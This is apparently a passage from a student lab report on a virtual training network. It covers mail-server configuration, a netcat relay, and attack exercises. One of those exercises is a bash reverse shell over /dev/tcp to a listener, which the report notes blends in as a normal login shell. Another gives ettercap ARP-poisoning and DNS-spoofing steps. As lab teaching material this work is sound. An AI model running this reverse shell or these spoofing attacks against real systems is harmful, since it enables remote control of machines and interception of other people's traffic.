ii. At first we should change the HOSTNAME to set net-r and change the cnames for all
the cloned servers on the Net-R domserv.
iii. Now on Mailhost, we should add the following sections to the file
/etc/stunnel/mh.server.conf
"
; Net-R addition
[smtps]
accept = 465
connect = 587
"
iv. Now we should change the file /etc/postfix.cf for serving the subnet
"
mydestination = localhost, $mydomain, localhost.$mydomain,
$myhostname, webmail.$mydomain,
# net-a.$mydomain, net-b.$mydomain, net-c.$mydomain
net-r.$mydomain

mynetworks = 127.0.0.0/8
# 192.168.56.0/24 192.168.66.0/24 192.168.76.0/24
192.168.234.0/24"
v Now we have to add a line for Net-R to /etc/postfix/virtual_mailbox
 vi. Enter the command
"/usr/sbin/postmap /etc/postfix/virtual_mailbox"
Finally we add the standard accounts. We can add the standard users to /home/vmail/mail-pwd
There will be an error for the mail going outside the subnet because of the designated relayhost
Now heading towards the WebServer,
i. change the file /etc/stunnel/www.server.conf to use Mailserver.
"
[smtps]
accept = 587
; connect = gw.tinynet.edu:465
connect = mailhost.net-r.tinynet.edu:465"
ii. Now, adjust the $domain in /var/ww/squirrelmail/config/config_svr_adrs.php
iii. Setting the IP address for the hosts as
"ifconfig eth0 192.168.234.120"
"ifconfig eth0 192.168.234.120"
iv. Now we should add the iptable rules by editing the file /etc/rc.d/rc.inetd1

Screenshots
Describe the Net-R automatic traffic generation system

The network will send (sill) messages between each other after the network has two hosts. A user
having username "otto" which automatically logs in when the system is turned on. We can see this user
by typing Alt + F8. Whenever host joins the network, it is added to the frenzy resulting quite busy
subnet. The time of lease for DHCP is two minutes.
Obstacles encountered
14. Port Knock
Owner:
Objective

List of configuration

For establishing the Netcat enter the following command

"mkfifo /tmp/piper"
Enter the following command in one of the virtual terminal on domserver,
“nc -l -p 23432 < /tmp/piper | tee /dev/stderr | nc localhost 587 |tee /tmp/piper”
and in another Virtual Terminal type telnet commands as
“telnet local host
HELO sending.server.name
MAIL From: mailadmin@mailhost.tinynet.edu
MAIL To: mailgovind@mailhost.tinynet.edu
DATA
Subject: HELLO
Hi There
.
QUIT”
Then in another virtual terminal to the listener we check the connection there too. The output is sent to
both screen (stderr) and nc (stdout) first and the nmaed pip is used second to catch input from both
sides of the conversation.

For the reverse shell, type

“bsdnc -lkv 23435”
And interactive shell is piped to it from the remote host with a classic one-liner from. This is now
compared to the way a tty is created inside the file “/var/net-r/autologin.sh” which is similar to
following scripts.
 “#!/bin/bash
echo "My PID is $$" # for testing
exec bash -i 0</dev/tcp/192.168.66.66/23435 1>&0 2>&0”
The commands typed in the listening server will be executed on the target and the output is sent back.
To, close the socket, type “exit”. If the test line is left uncommented, “ps -ax” shows associated name
including shell script’s pid which has been replaced by “bash -i”. It looks similar to the “-bash” which
is a normal login shell.

Screenshots
15. Ettercap

Owner:
Objective

List of configuration
For ARP with ettercap
- We should first install Ettercap from the TinynetConfig.iso
- Starting the ettercap with the “ettercap –C”
- Go to “sniff” and select “unified sniffing”. Again navigating the “host” menu select
“scan for hosts” after that goto “host list” where the possible ettercap found. Then
select domserv (192.168.234.101) from the host list. Then press 1 to add in target list.
- Then exit the host list and after that goto menu and select target and current targets.
Then on the screen the display shows the catch and forward traffic between Target 1
and Targets.
- After that exit the target list. Now select “MTTM” menu then select “Arp Poisoning”
to spoof the ARP tables and press “enter” to leave the parameters box empty.
Now going to Domserv and start link and log into squirrelmail on Net-R webserver.
- Try “arp” on each VM to view output.
For DNS
- Do the same step as done in ARP up to “unified sniffing”
- Then go to host menu and select “host list” then again select the domserv
(192.168.234.101) in the host list. And by press 2 to add the host list into the target list.
After that exit the host list and select “Plugins” and “Manage Plugins” from the menu.
Now select “dns_spoof” and select “enter” after that the zero will be shown on the left
change to one.
- Exit the “plugins” select “MTTM” menu and select “Arp Poisoning” to spoof the
ARP tables. Then leave the parameters box empty.
- Ping from Net-R webserver or Mailhost where the address is given in the
configuration. Use link on one of it to see new website.
- Use the following command line for two phased attack :
“ ettercap –T –q –P dns_spoof –M arp // //”
References
Saive, R. (2014). MultiTail - Monitor Multiple Files Simultaneously in a Single Linux Terminal. [online]
Tecmint.com. Available at: https://www.tecmint.com/view-multiple-files-in-linux/ [Accessed 8 Jan.
2020].